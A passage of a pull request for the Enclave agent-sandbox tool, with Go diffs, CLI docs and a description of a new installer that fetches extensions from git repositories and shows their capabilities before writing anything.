+	for i, match := range matches {
+		if match[1] != expected {
+			t.Errorf("envsubst whitelist %d in kit-init.sh is %q, KitInitSubstitutedVars says %q",
+				i, match[1], expected)
+		}
+	}
+}

--- a/internal/model/types.go
+++ b/internal/model/types.go
@@ -346,16 +346,24 @@ const (
 // a PortConfig.OpenURL.
 const PortHostPlaceholder = "{host_port}"
 
-func (p Profile) YoloEnabledValue() bool {
-	if p.YoloEnabled == nil {
+// YoloEnabledValue resolves an optional yoloEnabled flag: unset defaults to
+// true, so a bare yoloFlag is enough to bypass the agent's per-action approval
+// step.
+func YoloEnabledValue(v *bool) bool {
+	if v == nil {
 		return true
 	}
-	return *p.YoloEnabled
+	return *v
+}
+
+func (p Profile) YoloEnabledValue() bool {
+	return YoloEnabledValue(p.YoloEnabled)
 }
 
 type Extension struct {
 	Type        string   `json:"type"`
 	Name        string   `json:"name"`
+	DisplayName string   `json:"display_name,omitempty"`
 	Description string   `json:"description,omitempty"`
 	AptPackages []string `json:"apt_packages,omitempty"`
 	NeedsRoot   bool     `json:"needs_root,omitempty"`
@@ -578,11 +586,44 @@ const (
 )
 
 const (
-	InstallScriptFilename     = "install.sh"
+	InstallScriptFilename = "install.sh"
+	// ExtensionSourceFilename is the provenance sidecar the extension
+	// installer writes into a managed user extension directory. It is
+	// deliberately excluded from the docker build context and from the image
+	// identity hash, so re-pinning to a new commit with identical content does
+	// not force a rebuild.
+	ExtensionSourceFilename   = ".enclave-source.json"
 	CheckUpdateScriptFilename = "check-update.sh"
 	AllowlistFilename         = "gateway-allowlist.conf"
 	DefaultExtensionPriority  = 100
 )
+
+// Directories an extension may carry. entrypoint.sh runs the entrypoint
+// scripts and stages the files/ payloads at container start, so these names are
+// a contract with the shell rather than a choice this package makes;
+// TestExtensionLayoutMatchesShell pins them.
+const (
+	ExtensionFilesDir          = "files"
+	ExtensionFilesHomeDir      = "home"
+	ExtensionFilesWorkspaceDir = "workspace"
+	ExtensionGoDir             = "go"
+	ToolEntrypointDir          = "entrypoint.d"
+	FeatureEntrypointDir       = "feature-entrypoint.d"
+)
+
+// The envsubst whitelist runtime-assets/kit-init.sh applies to an initFiles
+// path: WORKDIR is bound to the project directory, while HOME and USER come
+// from the container environment. A variable outside this set is left literal,
+// so it resolves like any other path segment.
+const (
+	KitInitWorkdirVar = "WORKDIR"
+	KitInitHomeVar    = "HOME"
+	KitInitUserVar    = "USER"
+)
+
+// KitInitSubstitutedVars is the whole whitelist, in the order kit-init.sh
+// passes it to envsubst.
+var KitInitSubstitutedVars = []string{KitInitWorkdirVar, KitInitHomeVar, KitInitUserVar}
 
 const (
 	GatewayImageTagLatest        = "latest"

--- a/internal/util/util.go
+++ b/internal/util/util.go
@@ -283,17 +283,6 @@ func RedactSecret(value string) string {
 	return "****"
 }
 
-// NonEmptyLines splits text into trimmed lines, dropping blank ones.
-func NonEmptyLines(text string) []string {
-	var lines []string
-	for _, line := range strings.Split(text, "\n") {
-		if trimmed := strings.TrimSpace(line); trimmed != "" {
-			lines = append(lines, trimmed)
-		}
-	}
-	return lines
-}
-
 func TitleCase(value string) string {
 	if value == "" {
 		return value

--- a/internal/util/util.go
+++ b/internal/util/util.go
@@ -283,6 +283,17 @@ func RedactSecret(value string) string {
 	return "****"
 }
 
+// NonEmptyLines splits text into trimmed lines, dropping blank ones.
+func NonEmptyLines(text string) []string {
+	var lines []string
+	for _, line := range strings.Split(text, "\n") {
+		if trimmed := strings.TrimSpace(line); trimmed != "" {
+			lines = append(lines, trimmed)
+		}
+	}
+	return lines
+}
+
 func TitleCase(value string) string {
 	if value == "" {
 		return value

--- a/website/docs/docs/cli.md
+++ b/website/docs/docs/cli.md
@@ -30,6 +30,9 @@ auth subcommands, and build flags, see the
 | `enclave ps` | List the sessions that are currently running. |
 | `enclave --background` | Start a session detached from your terminal. |
 | `enclave attach <name>` | Attach to a running session by session or container name (default detach key: `Ctrl-\`). |
+| `enclave tools list` | List the available agents, built-in and installed. |
+| `enclave features list` | List the optional features you can enable. |
+| `enclave tools add <source>` | Install an agent from a git repository (same for `features`). |
 
 ## Start a session
 
@@ -69,6 +72,45 @@ Code, Codex, Theia AI, OpenCode, and more.
 ```bash
 enclave --tool codex
 ```
+
+## Add your own agents and features
+
+Agents and optional features ship as extensions: a directory with a `spec.yaml`
+that describes how the software is installed, how it authenticates, and which
+domains it may reach. List what you have, including anything you added yourself:
+
+```bash
+enclave tools list
+enclave features list
+```
+
+Install one from any git repository, by `owner/repo` shorthand, a full clone URL,
+or a local path:
+
+```bash
+enclave tools add acme/kits
+enclave features add ./my-kits
+```
+
+Enclave scans the repository for matching extensions and installs the one it
+finds. When there are several, it asks which one you meant, or you select with
+`--name` and take all of them with `--all`.
+
+An extension runs code when the container is built and started, so Enclave shows
+what it can do before writing anything: whether it needs root, runs an install or
+startup script, widens the network allowlist, declares credentials, or seeds
+files into your project. `--yes` skips the confirmation, never the summary.
+
+Refresh installed extensions from the source they came from, or remove them
+again:
+
+```bash
+enclave tools update            # all of them, or name the ones you want
+enclave tools remove my-agent
+```
+
+`update` refreshes the extension on your host. The image is rebuilt the next time
+you start a session that uses it.
 
 ## Resume a previous session
 


### PR DESCRIPTION
#### What it does

Adds an installer so tools and features can come from a git repository instead of
only shipping in the box.

`enclave tools|features add <source>` fetches a repository with a blobless sparse
checkout, stages it in a temp directory, validates and sanitizes the tree, and
swaps it into `~/.config/enclave/extensions/`. `update` re-fetches from the
recorded source, `remove` deletes, and `list` now reports built-in and installed
extensions side by side with where each one came from.

Because an extension runs code at image build and container start, `add` and
`update` print a capability summary distilled from the staged content before
writing anything: root install steps, install and startup scripts, allowlist
changes, declared credentials, the approval-bypass flag, skills, host config
passthrough, and files seeded into the project. `update` shows that summary as a
diff against what is installed, so a newly granted capability is visible before
you accept it. `--yes` skips the prompt, never the summary.

Each install records provenance in `.enclave-source.json` (remote, ref, commit,
tree hash, installer version). The sidecar is excluded from the build context and
the image identity hash, so re-pinning to a new commit with identical content does
not force a rebuild. The tree hash is what detects hand edits, and directories
without a sidecar are treated as unmanaged.

Docs are in `docs/extensions/installing.md`, with a shorter version on the website
under CLI commands.

Three commits, by layer: spec summaries and path resolution, then the
`internal/extinstall` package, then the CLI and app wiring.

#### How to test

The example repo is https://github.com/eclipse-enclave/enclave-extensions. It has
two `kind: sandbox` tools, `openclaw` and `dsh`, and no features. Its content is
still in review as eclipse-enclave/enclave-extensions#1, so until that merges the
commands below need `--ref initial-extensions`.

Build with `make build` and use `./bin/enclave`.

List, and note the source column:

```bash
enclave tools list
enclave features list
```

Install both tools. Without `--all` this lists the two candidates and asks which
one you meant:

```bash
enclave tools add eclipse-enclave/enclave-extensions
enclave tools add eclipse-enclave/enclave-extensions --all
```

Read the capability summary before confirming. `openclaw` and `dsh` both run an
install script and widen the allowlist, so there should be something to see. Then
check `enclave tools list` and `cat ~/.config/enclave/extensions/tools/openclaw/.enclave-source.json`.

Remove and add a single one back:

```bash
enclave tools remove dsh
enclave tools add eclipse-enclave/enclave-extensions --name dsh
```

Wrong kind, which should point you at the other verb rather than say "nothing
found":

```bash
enclave features add eclipse-enclave/enclave-extensions
```

For `update`, install from a local clone so you can create a change to pull:

```bash
git clone -b initial-extensions https://github.com/eclipse-enclave/enclave-extensions /tmp/ext
enclave tools remove openclaw dsh
enclave tools add /tmp/ext --all

# widen a capability, e.g. append a conf-file= line to
# /tmp/ext/tools/dsh/gateway-allowlist.conf, then commit it
git -C /tmp/ext commit -am "test: widen allowlist"

enclave tools update dsh
```

The summary should show that line as an added allowlist directive against what is
installed. `enclave tools update` with no name updates everything.

Worth poking at as well: `--dry-run` writes nothing, editing an installed file by
hand makes `update` refuse until `--force`, and `--json` requires `--yes`.

Finally, start a session with an installed tool (`enclave --tool dsh`) to confirm
the install triggers a rebuild and the extension actually works in the container.

#### Follow-ups

- The `owner/repo` shorthand is two segments, so GitLab subgroup repos need a full
  clone URL plus `--path`. Documented, not fixed.
- No version constraints or lockfile. You pin a ref, and `update` follows it.
- The website page covers the basics only. It links nothing yet for authoring an
  extension to install.
- #69: a sidecar that cannot be read blocks `add --force`, so recovery means
  `remove --force` first.

#### Breaking changes

- [ ] This PR introduces breaking changes and has been coordinated with maintainers.

`tools list` and `features list` gain fields under `--json`, but the envelope stays
`schemaVersion: "1"` and existing fields are unchanged.

#### Review checklist

- [x] As an author, I have thoroughly tested my changes and carefully followed the [contribution guidelines](https://github.com/eclipse-enclave/enclave/blob/main/CONTRIBUTING.md).

